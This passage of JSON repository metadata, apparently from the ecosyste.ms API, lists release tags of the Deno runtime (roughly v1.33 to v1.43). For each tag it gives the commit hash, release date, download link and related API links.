f8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-